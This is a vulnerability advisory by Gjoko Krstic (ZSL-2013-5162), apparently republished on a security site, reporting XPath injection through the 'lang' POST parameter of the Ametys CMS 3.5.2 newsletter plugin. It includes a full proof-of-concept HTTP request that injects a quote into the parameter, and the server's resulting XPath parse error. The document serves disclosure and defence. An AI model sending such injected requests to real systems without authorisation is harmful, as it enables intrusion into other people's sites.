Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability

2013.11.29
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability Vendor: Anyware Services Product web page: http://www.ametys.org Affected version: 3.5.2 and 3.5.1 Summary: Ametys is a Java-based open source CMS combining rich content with an easy-to-use and intuitive interface. Desc: Input passed via the 'lang' POST parameter in the newsletter plugin is not properly sanitised before being used to construct a XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code. Tested on: Microsoft Windows 7 Ultimate (EN) 32bit Jetty 6.1.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5162 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php 24.11.2013 -- Request: -------- POST /cms/plugins/newsletter/category/nodes HTTP/1.1 Host: 192.168.8.11:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.8.11:8080/cms/event/index.html Content-Length: 137 Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Connection: keep-alive Pragma: no-cache Cache-Control: no-cache sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root Response: --------- HTTP/1.1 500 Internal Server Error Date: Sun, 24 Nov 2013 00:55:08 GMT Content-Type: text/html; charset=utf-8 Server: Jetty(6.1.21) Content-Length: 27280 ... ... org.apache.jackrabbit.spi.commons.query.xpath.ParseException: Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68. Was expecting one of: "or" ... "and" ... "div" ... "idiv" ... "mod" ... "*" ... "return" ... "to" ... "where" ... "intersect" ... "union" ... "except" ... <Instanceof> ... <Castable> ... "/" ... "//" ... "=" ... "is" ... ... ...

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top